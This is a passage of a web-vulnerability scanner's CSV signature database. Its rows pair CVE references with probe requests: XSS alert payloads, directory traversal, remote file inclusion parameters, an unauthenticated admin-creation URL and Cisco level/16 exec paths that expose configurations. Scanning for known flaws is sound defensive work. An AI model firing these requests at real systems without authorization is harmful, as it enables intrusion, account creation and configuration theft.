users.\",\"\",\"\"\n\"001196\",\"\",\"d\",\"/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\"GET\",\"BODY:The remote procedure call failed\",\"This dll is vulnerable to a remote overflow that can allow attackers to execute remote commands.\",\"\",\"\"\n\"001197\",\"MS03-051\",\"d\",\"/_vti_bin/_vti_aut/fp30reg.dll\",\"GET\",\"CODE:200\",\"Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow.\",\"\",\"\"\n\"001198\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/access.cnf\",\"GET\",\"CODE:200\",\"Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001199\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/botinfs.cnf\",\"GET\",\"BODY:vti_encoding\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001200\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/bots.cnf\",\"GET\",\"BODY:vti_encoding\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001201\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/service.cnf\",\"GET\",\"CODE:200\",\"Contains meta-information about the web server Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001202\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/services.cnf\",\"GET\",\"CODE:200\",\"Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.\",\"\",\"\"\n\"001203\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/svacl.cnf\",\"GET\",\"CODE:200\",\"File used to store whether subwebs have unique permissions settings and any IP address restrictions. Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001204\",\"CVE-2002-1717\",\"23\",\"/_vti_pvt/writeto.cnf\",\"GET\",\"CODE:200\",\"Contains information about form handler result files. Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001205\",\"CVE-2002-1717\",\"3\",\"/_vti_pvt/linkinfo.cnf\",\"GET\",\"CODE:200\",\"IIS file shows http links on and off site. Might show host trust relationships and other machines on network.\",\"\",\"\"\n\"001206\",\"CWE-552\",\"b\",\"@TOMCATADMIN\",\"GET\",\"BODY:Tomcat's administration web application\",\"Tomcat is installed, however the administration package does not appear to be.\",\"\",\"\"\n\"001207\",\"\",\"b\",\"/isx.html\",\"GET\",\"BODY:InfraStruXure Manager\",\"APC InfraStruXure Manager management page found. Content may reveal software version.\",\"\",\"\"\n\"001208\",\"CVE-2001-0748\",\"7\",\"///\",\"GET\",\"BODY:Acme\\.Serve v1\\.7\",\"Acme.Serve allows arbitrary file retrieval\",\"\",\"\"\n\"001209\",\"CWE-552\",\"3\",\"@CGIDIRSblog/mt-check.cgi\",\"GET\",\"BODY:Current working directory\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"001210\",\"CVE-2002-0855\",\"4\",\"/mailman/admin/ml-name?\\\"><script>alert('Vulnerable')</script>;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Mailman is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001211\",\"CVE-2002-1899\",\"4\",\"/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=@JUNK(5)@example.com\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001212\",\"CWE-552\",\"b\",\"/mailman/listinfo\",\"GET\",\"BODY:mailing list\",\"Mailman was found on the server.\",\"\",\"\"\n\"001213\",\"CVE-1999-0678\",\"3\",\"/doc/\",\"GET\",\"CODE:200\",\"The /doc/ directory is browsable. This may be /usr/doc.\",\"\",\"\"\n\"001214\",\"CVE-1999-0678\",\"3\",\"/doc\",\"GET\",\"CODE:200\",\"The /doc directory is browsable. This may be /usr/doc.\",\"\",\"\"\n\"001215\",\"CVE-2001-0835\",\"4\",\"/webalizer/\",\"GET\",\"BODY:Generated by The Webalizer\",\"Webalizer may be installed.\",\"\",\"\"\n\"001216\",\"CVE-2001-0835\",\"4\",\"/web/\",\"GET\",\"BODY:Generated by The Webalizer\",\"Webalizer may be installed.\",\"\",\"\"\n\"001217\",\"CVE-2001-0835\",\"4\",\"/usage/\",\"GET\",\"BODY:Generated by (?:The )?Webalizer\",\"Webalizer may be installed.\",\"\",\"\"\n\"001218\",\"\",\"3\",\"/sitemap.xml\",\"GET\",\"CODE:200&&BODY:<urlset\",\"The sitemap.xml file provides a listing of the site content.\",\"\",\"\"\n\"001220\",\"CVE-2005-2413\",\"c\",\"/photo_album/apa_phpinclude.inc.php?apa_module_basedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Atomic Photo Album could allow remote source inclusion.\",\"\",\"\"\n\"001221\",\"CVE-1999-0930\",\"a\",\"/cgis/wwwboard/wwwboard.cgi\",\"GET\",\"CODE:200\",\"Versions 2.0 Alpha and below have multiple problems. This could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.\",\"\",\"\"\n\"001222\",\"CVE-1999-0930\",\"a\",\"/cgis/wwwboard/wwwboard.pl\",\"GET\",\"CODE:200\",\"Versions 2.0 Alpha and below have multiple problems. This could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.\",\"\",\"\"\n\"001223\",\"CVE-2006-2397\",\"4\",\"/affich.php?image=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001224\",\"CVE-2006-2397\",\"4\",\"/diapo.php?rep=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001225\",\"CVE-2006-2397\",\"4\",\"/index.php?rep=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GPhotos index.php rep Variable XSS.\",\"\",\"\"\n\"001226\",\"CVE-2000-0672\",\"7\",\"@TOMCATADMINcontextAdmin/contextAdmin.html\",\"GET\",\"CODE:200\",\"Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.\",\"\",\"\"\n\"001227\",\"https://vulners.com/nessus/FCGI_ECHO.NASL\",\"4\",\"/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001228\",\"https://vulners.com/nessus/FCGI_ECHO.NASL\",\"4\",\"/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001229\",\"https://vulners.com/nessus/FCGI_ECHO.NASL\",\"4\",\"/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001230\",\"https://vulners.com/nessus/FCGI_ECHO.NASL\",\"4\",\"/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001231\",\"CVE-2001-0500\",\"3\",\"/blahb.ida\",\"GET\",\"CODE:200&&!BODY:file blahb\\.ida could not\",\"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.\",\"\",\"\"\n\"001232\",\"CVE-2001-0500\",\"3\",\"/blahb.idq\",\"GET\",\"CODE:200&&!BODY:file blahb\\.idq could not\",\"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.\",\"\",\"\"\n\"001233\",\"https://www.exploit-db.com/exploits/21677\",\"a\",\"/ab2/\\@AdminViewError\",\"GET\",\"CODE:200\",\"Sun Answerbook allows viewing of the error logs without authentication.\",\"\",\"\"\n\"001236\",\"CVE-2002-1167\",\"4\",\"/\\\"><img%20src=\\\"javascript:alert(document.domain)\\\">\",\"GET\",\"BODY:<img src=\\\"javascript:alert\\(document\\.domain\\)\\\">\",\"The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001237\",\"CWE-552\",\"3\",\"/Survey/Survey.Htm\",\"GET\",\"BODY:System Components\",\"This Compaq device, without authentication, gives lots of system information.\",\"\",\"\"\n\"001238\",\"CWE-552\",\"3\",\"/WEBAGENT/CQMGSERV/CF-SINFO.TPF\",\"GET\",\"BODY:General Information\",\"This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL\",\"\",\"\"\n\"001239\",\"CVE-2000-0696\",\"a\",\"/ab2/\\@AdminAddadmin?uid=foo&password=bar&re_password=bar\",\"GET\",\"CODE:200\",\"Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'.\",\"\",\"\"\n\"001240\",\"CVE-2005-0548\",\"4\",\"/ab2/Help_C/\\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>\",\"GET\",\"BODY:<script>alert\\(Vulnerable\\)<\\/script>\",\"Sun Answerbook is vulnerable to XSS in the search field.\",\"\",\"\"\n\"001241\",\"CVE-2002-1785\",\"4\",\"/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001243\",\"\",\"b\",\"/BACLIENT\",\"GET\",\"CODE:200\",\"IBM Tivoli default file found.\",\"\",\"\"\n\"001244\",\"CWE-552\",\"1b\",\"/postinfo.html\",\"GET\",\"BODY:Web Publishing Information\",\"Microsoft FrontPage default file found.\",\"\",\"\"\n\"001245\",\"CVE-2006-5601\",\"3b\",\"/na_admin/ataglance.html\",\"GET\",\"BODY:Filer At\",\"NetApp application displays detailed system information.\",\"\",\"\"\n\"001246\",\"CVE-2000-0097 MS00-006\",\"7\",\"/scripts/samples/search/qfullhit.htw\",\"GET\",\"BODY:QUERY\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval.\",\"\",\"\"\n\"001247\",\"CVE-2000-0097 MS00-006\",\"7\",\"/scripts/samples/search/qsumrhit.htw\",\"GET\",\"BODY:QUERY\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval.\",\"\",\"\"\n\"001248\",\"CVE-2000-0097 MS00-006\",\"7\",\"/@JUNK(5).htw\",\"GET\",\"BODY:QUERY\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed.\",\"\",\"\"\n\"001251\",\"CVE-2001-0374\",\"28a\",\"http://127.0.0.1:2301/%20HTTP/1.0\",\"GET\",\"BODY:Compaq WBEM Device\",\"The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass.\",\"\",\"\"\n\"001252\",\"CVE-2002-1982\",\"37\",\"/file/../../../../../../../../etc/\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.\",\"\",\"\"\n\"001253\",\"CVE-2001-0537\",\"8\",\"/level/16/exec/-///pwd\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001254\",\"CVE-2001-0537\",\"8\",\"/level/16/exec/-///show/configuration\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001255\",\"CVE-2001-0537\",\"8\",\"/level/16\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001256\",\"CVE-2001-0537\",\"8\",\"/level/16/exec/\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001257\",\"CVE-2001-0537\",\"8\",\"/level/16/exec//show/access-lists\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001258\",\"CVE-2001-0537\",\"8\",\"/level/16/level/16/exec//show/configuration\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001259\",\"CVE-2001-0537\",\"8\",\"/level/16/level/16/exec//show/interfaces\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001260\",\"CVE-2001-0537\",\"8\",\"/level/16/level/16/exec//show/interfaces/status\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001261\",\"CVE-2001-0537\",\"8\",\"/level/16/level/16/exec//show/version\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001262\",\"CVE-2001-0537\",\"8\",\"/level/16/level/16/exec//show/running-config/interface/FastEthernet\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001263\",\"CVE-2001-0537\",\"8\",\"/level/16/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001264\",\"CVE-2001-0537\",\"8\",\"/level/17/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001265\",\"CVE-2001-0537\",\"8\",\"/level/18/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001266\",\"CVE-2001-0537\",\"8\",\"/level/19/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001267\",\"CVE-2001-0537\",\"8\",\"/level/20/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001268\",\"CVE-2001-0537\",\"8\",\"/level/21/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001269\",\"CVE-2001-0537\",\"8\",\"/level/22/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001270\",\"CVE-2001-0537\",\"8\",\"/level/23/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001271\",\"CVE-2001-0537\",\"8\",\"/level/24/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001272\",\"CVE-2001-0537\",\"8\",\"/level/25/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001273\",\"CVE-2001-0537\",\"8\",\"/level/26/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001274\",\"CVE-2001-0537\",\"8\",\"/level/27/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001275\",\"CVE-2001-0537\",\"8\",\"/level/28/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001276\",\"CVE-2001-0537\",\"8\",\"/level/29/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001277\",\"CVE-2001-0537\",\"8\",\"/level/30/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001278\",\"CVE-2001-0537\",\"8\",\"/level/31/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001279\",\"CVE-2001-0537\",\"8\",\"/level/32/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001280\",\"CVE-2001-0537\",\"8\",\"/level/33/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001281\",\"CVE-2001-0537\",\"8\",\"/level/34/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001282\",\"CVE-2001-0537\",\"8\",\"/level/35/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001283\",\"CVE-2001-0537\",\"8\",\"/level/36/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001284\",\"CVE-2001-0537\",\"8\",\"/level/37/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001285\",\"CVE-2001-0537\",\"8\",\"/level/38/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001286\",\"CVE-2001-0537\",\"8\",\"/level/39/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001287\",\"CVE-2001-0537\",\"8\",\"/level/40/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001288\",\"CVE-2001-0537\",\"8\",\"/level/41/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001289\",\"CVE-2001-0537\",\"8\",\"/level/42/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001290\",\"CVE-2001-0537\",\"8\",\"/level/43/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001291\",\"CVE-2001-0537\",\"8\",\"/level/44/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001292\",\"CVE-2001-0537\",\"8\",\"/level/45/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001293\",\"CVE-2001-0537\",\"8\",\"/level/46/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001294\",\"CVE-2001-0537\",\"8\",\"/level/47/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001295\",\"CVE-2001-0537\",\"8\",\"/level/48/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001296\",\"CVE-2001-0537\",\"8\",\"/level/49/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001297\",\"CVE-2001-0537\",\"8\",\"/level/50/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001298\",\"CVE-2001-0537\",\"8\",\"/level/51/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001299\",\"CVE-2001-0537\",\"8\",\"/level/52/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001300\",\"CVE-2001-0537\",\"8\",\"/level/53/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001301\",\"CVE-2001-0537\",\"8\",\"/level/54/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001302\",\"CVE-2001-0537\",\"8\",\"/level/55/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001303\",\"CVE-2001-0537\",\"8\",\"/level/56/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001304\",\"CVE-2001-0537\",\"8\",\"/level/57/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001305\",\"CVE-2001-0537\",\"8\",\"/level/58/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001306\",\"CVE-2001-0537\",\"8\",\"/level/59/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001307\",\"CVE-2001-0537\",\"8\",\"/level/60/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001308\",\"CVE-2001-0537\",\"8\",\"/level/61/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001309\",\"CVE-2001-0537\",\"8\",\"/level/62/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001310\",\"CVE-2001-0537\",\"8\",\"/level/63/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001311\",\"CVE-2001-0537\",\"8\",\"/level/64/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001312\",\"CVE-2001-0537\",\"8\",\"/level/65/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001313\",\"CVE-2001-0537\",\"8\",\"/level/66/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001314\",\"CVE-2001-0537\",\"8\",\"/level/67/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001315\",\"CVE-2001-0537\",\"8\",\"/level/68/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001316\",\"CVE-2001-0537\",\"8\",\"/level/69/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001317\",\"CVE-2001-0537\",\"8\",\"/level/70/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001318\",\"CVE-2001-0537\",\"8\",\"/level/71/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001319\",\"CVE-2001-0537\",\"8\",\"/level/72/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001320\",\"CVE-2001-0537\",\"8\",\"/level/73/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001321\",\"CVE-2001-0537\",\"8\",\"/level/74/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001322\",\"CVE-2001-0537\",\"8\",\"/level/75/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001323\",\"CVE-2001-0537\",\"8\",\"/level/76/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001324\",\"CVE-2001-0537\",\"8\",\"/level/77/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001325\",\"CVE-2001-0537\",\"8\",\"/level/78/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001326\",\"CVE-2001-0537\",\"8\",\"/level/79/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001327\",\"CVE-2001-0537\",\"8\",\"/level/80/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001328\",\"CVE-2001-0537\",\"8\",\"/level/81/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001329\",\"CVE-2001-0537\",\"8\",\"/level/82/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001330\",\"CVE-2001-0537\",\"8\",\"/level/83/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001331\",\"CVE-2001-0537\",\"8\",\"/level/84/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001332\",\"CVE-2001-0537\",\"8\",\"/level/85/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001333\",\"CVE-2001-0537\",\"8\",\"/level/86/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001334\",\"CVE-2001-0537\",\"8\",\"/level/87/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001335\",\"CVE-2001-0537\",\"8\",\"/level/88/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001336\",\"CVE-2001-0537\",\"8\",\"/level/89/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001337\",\"CVE-2001-0537\",\"8\",\"/level/90/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001338\",\"CVE-2001-0537\",\"8\",\"/level/91/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001339\",\"CVE-2001-0537\",\"8\",\"/level/92/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001340\",\"CVE-2001-0537\",\"8\",\"/level/93/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001341\",\"CVE-2001-0537\",\"8\",\"/level/94/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001342\",\"CVE-2001-0537\",\"8\",\"/level/95/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001343\",\"CVE-2001-0537\",\"8\",\"/level/96/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001344\",\"CVE-2001-0537\",\"8\",\"/level/97/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001345\",\"CVE-2001-0537\",\"8\",\"/level/98/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001346\",\"CVE-2001-0537\",\"8\",\"/level/99/exec//show\",\"GET\",\"CODE:200\",\"CISCO HTTP service allows remote execution of commands\",\"\",\"\"\n\"001347\",\"CVE-2002-1412\",\"c\",\"/gallery/captionator.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001348\",\"CVE-2002-1412\",\"c\",\"/gallery/errors/configmode.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001350\",\"CVE-2002-1412\",\"c\",\"/gallery/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001351\",\"CVE-2002-1412\",\"c\",\"/gallery/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.\",\"\",\"\"\n\"001352\",\"CVE-2002-1353\",\"3\",\"/users.lst\",\"GET\",\"CODE:200\",\"LocalWEB2000 users.lst passwords found\",\"\",\"\"\n\"001353\",\"WS_FTP.LOG\",\"23\",\"/WS_FTP.LOG\",\"GET\",\"CODE:200\",\"WS_FTP.LOG file was found. It may contain sensitive 